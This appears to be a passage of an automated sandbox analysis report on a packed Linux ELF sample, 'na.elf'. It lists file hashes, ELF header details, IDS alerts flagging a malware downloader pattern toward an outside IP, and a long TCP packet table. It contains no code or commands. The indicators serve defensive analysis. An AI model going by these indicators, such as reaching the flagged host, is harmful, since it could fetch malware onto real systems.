SSDEEP:	3:N/eWIvn:Mbvn
MD5:	6674CF095B7E7BCF248A100C1EA8A937
SHA1:	1A41EEDF06C6551FAB4653C12C19E2B41EA35E86
SHA-256:	ED997D12AD6D30F0EDE8E35B69A539ED4051C2736EEF0E44322C0FDF997CEEFC
SHA-512:	8CA7567263321DC53B2F70CB257C586E3CA7851D4F18972B8919F727A46D091FB18E961319D294D1A0D041887303DE10D66551FA20F91BB76902AE5F1DA560C3
Malicious:	false
Reputation:	low
Preview:	6431.galassia.

/var/lib/fwupd/gnupg/.#lk0x0000561fc14f8b80.galassia.6429

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
SSDEEP:	3:N/feHJ/wvn:AHJ/wvn
MD5:	9533D74A4163436431DF5EC1655100C2
SHA1:	620A3FE82F4FAD094DB2F36C54C928D03A21DB92
SHA-256:	B8A0D8E3ADD905EDC6BABDEF869D35DA465D8ABB01A447F177206525B61E896E
SHA-512:	23AD02A6767E441C994F27D41FF2491FF1CAB0AC2E12869FD28084B87C064FB531A18BDC97E8FC0FC3013BAE9A93F2FE008924161437242B1AE4F35FC445878A
Malicious:	false
Reputation:	low
Preview:	6429.galassia.

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Download File

Process:	/usr/bin/gpg
File Type:	GPG keybox database version 1, created-at Tue Aug 17 14:04:41 2021, last-maintained Mon Mar 31 08:53:06 2025
Category:	dropped
Size (bytes):	2534
Entropy (8bit):	7.619443505146184
Encrypted:	false
SSDEEP:	48:sqZ3Buh7g8ZMUfN1i9N+EvbYJYv20hIhoRU3h0LJv9ARRt:bUc8ZM+Y+AbcoRU3CARRt
MD5:	C650C0B9851FFF968B7A52BDDA6CCC9B
SHA1:	059E843ABBD0810BFEAC062140AF969286AC5092
SHA-256:	B5121DC133751802526FF0F240B9C52C08CF9BEC9721F0CFFE52D4A8F9871FB8
SHA-512:	EE893E3DAEE1450076D639632223FF8520D50E536C3F281D748400A87EC1A700243B3F79A3B8ACE3A47C4C8A11E3BCCA5987D387A12D409D8B5039130EA564EC
Malicious:	false
Reputation:	low
Preview:	... ....KBXf....a...g.W....................^........?..A..../.H...E8..... .............~............................a...........U.........T.x8.sU....K'....F....l...K....cL.`Y......=....^~.5\|.%.......2..../.h..O..T........'.6E....HV..?.6l.......e..1o.O.,Y3....1,..a4..\|..s.w......f2......gaIK..i...x.T...~..W..N."..Z..ia!..V..so.....<.6j..........3C&..t1..Gf...j..z...U.........gpg.........Linux Vendor Firmware Service <sign@fwupd.org>....gpg.........7.....!..U..................................H...E8..c....d.....d.....3....a..y..?...........l...1/...)......T.f....-..UoxT... .v...\|...7.....d..PB..>..W{...-..R....&S.....~..2.ps.8:...{..^{?..@.?..e6....y...c.Rw.SK.F.;U)...A..S> an....W.?.\|.{.dB....x~B...V....O....'./!...\|;...Xw.:.!.p,n.A.H\..\...).....gpg......z.......D<............~...$......B.Y..A...n.m...o=.... ......8>4.G8E..L...+G..Z...<.................Z............................a...........[.......I....DR:....!._.P..`.1..6.9..G....O.y.?.......

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.942823038040744
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	na.elf
File size:	435'932 bytes
MD5:	cb12d1dd62d556d8baa0d115e6d41083
SHA1:	614a2974a372443717d9e765ae263fdf8025e1e8
SHA256:	f91c066c91adc1434c8182791a7e176ec7367baa09f98084c4d3949ea48ee546
SHA512:	9ce187157aca9644aacd5942456bf7a939dab26fe9b3145d818ac9cd455da95bae411948f8a056adcf888dde986383c928f71e7854f2ee6b2e1f2a70d4ce4a2e
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgq:25WOSACZSV6eKRH5EPiamb4DsDwwca
TLSH:	899423F8C83D2E3098169B3CBB5A826CF0A15772D9562F6EB51AF5732179F1FAC60101
File Content Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v.

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x15de360
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	0
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x400000	0x400000	0x1000	0x1174858	7.6054	0x6	RW	0x1000
LOAD	0x0	0x1575000	0x1575000	0x69e4d	0x69e4d	7.9430	0x5	R E	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x10

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-31T10:53:09.953180+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.23	58304	152.36.128.18	80	TCP
2025-03-31T10:53:10.612353+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.23	58306	152.36.128.18	80	TCP

Network Port Distribution

Total Packets: 287
• 443 (HTTPS)
• 80 (HTTP)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 31, 2025 10:52:47.685095072 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:47.685352087 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:47.714291096 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:47.714497089 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:47.789057970 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:47.789203882 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:47.804982901 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:47.805109978 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:47.890753031 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:47.908972025 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:47.909080029 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.009366989 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.033535004 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.033607006 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.135690928 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.135729074 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.135852098 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.161329985 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.161442041 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.161504030 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.241409063 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.241449118 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.241605997 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.265445948 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.265477896 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.265579939 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.344376087 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.344542980 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.344655991 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.369648933 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.369699001 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.369756937 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.444812059 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.444848061 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.445064068 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.473701954 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.473737001 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.473824978 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.548877954 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.548913956 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.549186945 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.577231884 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.577270031 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.577344894 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.605115891 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.652683973 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.652760983 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.652961016 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.682023048 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.682059050 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.682117939 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.727310896 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.756920099 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.756953955 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.757201910 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.784111023 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.784147024 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.784209013 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.829391956 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.829427004 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.829617023 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.865803003 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.886311054 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.886351109 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.886485100 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.886485100 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.931735992 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.931802034 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.931874037 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.932877064 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:48.990242958 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.990281105 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:48.991390944 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.001104116 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.001168013 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.328741074 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.328876019 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.430555105 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.430669069 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.532881021 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.532921076 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.532980919 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.532980919 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.635970116 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.636071920 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.743081093 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.743169069 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.754358053 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.754478931 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.845695019 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.845765114 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.863888025 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.863938093 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:49.972803116 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:49.972850084 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.002381086 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.002423048 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.078599930 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.078658104 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.180479050 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.180519104 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.282423973 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.282473087 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.293132067 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.293176889 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.386487007 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.386542082 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.406419992 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.406464100 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.511318922 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.511363983 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.614332914 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.614383936 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.628740072 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.628802061 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.720284939 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.720350981 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.748855114 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.748903036 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.823308945 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.823390961 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.836671114 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.836755991 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.868522882 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.868622065 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.927467108 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.927591085 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.941211939 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.941402912 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:50.972415924 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:50.972541094 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.045319080 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.045377016 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.078954935 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.079004049 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.148680925 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.148751020 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.163638115 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.163780928 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.255089045 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.267247915 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.267313004 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.371547937 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.388107061 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.388180971 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.415385008 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.470932961 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.492455006 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.504595041 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.504815102 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.526913881 CEST	43928	443	192.168.2.23	91.189.91.42
Mar 31, 2025 10:52:51.571914911 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.602047920 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.602135897 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.619462013 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.682877064 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.704533100 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.718555927 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.718728065 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.788073063 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.788110971 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.788208008 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.820441961 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.820462942 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.820516109 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.891123056 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.891148090 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.891418934 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:51.925895929 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.925916910 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:51.925992012 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.026904106 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.026925087 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.026977062 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.026977062 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.133464098 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.133677006 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.142100096 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.142225027 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.239058971 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.281085968 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.281140089 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.382788897 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.382872105 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.398246050 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.398335934 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.430424929 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.430546045 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.500583887 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.533747911 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.533883095 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:52.937958956 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:52.938015938 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.367769957 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.367881060 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.471607924 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.471714973 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.494164944 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.494304895 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.577826977 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.577976942 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.594808102 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.594909906 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.681730032 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.681834936 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.700916052 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.700994968 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.784984112 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.785074949 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.798727036 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.798844099 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.831393003 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.831497908 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.887404919 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.887494087 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.902043104 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.902148008 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:53.988399029 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:53.988493919 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.004221916 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.004276991 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.095834970 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.095977068 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.107553005 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.107620955 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.196234941 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.210117102 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.210338116 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.320143938 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.356406927 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.356476068 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.461659908 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.461754084 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.503289938 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.503463030 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.610183001 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.631062984 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.631117105 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.731451035 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.759864092 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.759917021 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.858948946 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.858989000 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.859157085 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.885787964 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.885827065 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.885926008 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.991511106 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.991592884 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:54.991620064 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:54.991666079 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.095396996 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.095511913 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.109364986 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.109513998 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.203711033 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.246373892 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.352200031 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.352278948 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.368443012 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.368518114 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.474145889 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.474242926 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.576481104 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.576668978 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.682744026 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.682913065 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.701872110 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.701944113 CEST	55238	443	192.168.2.23	199.232.90.49
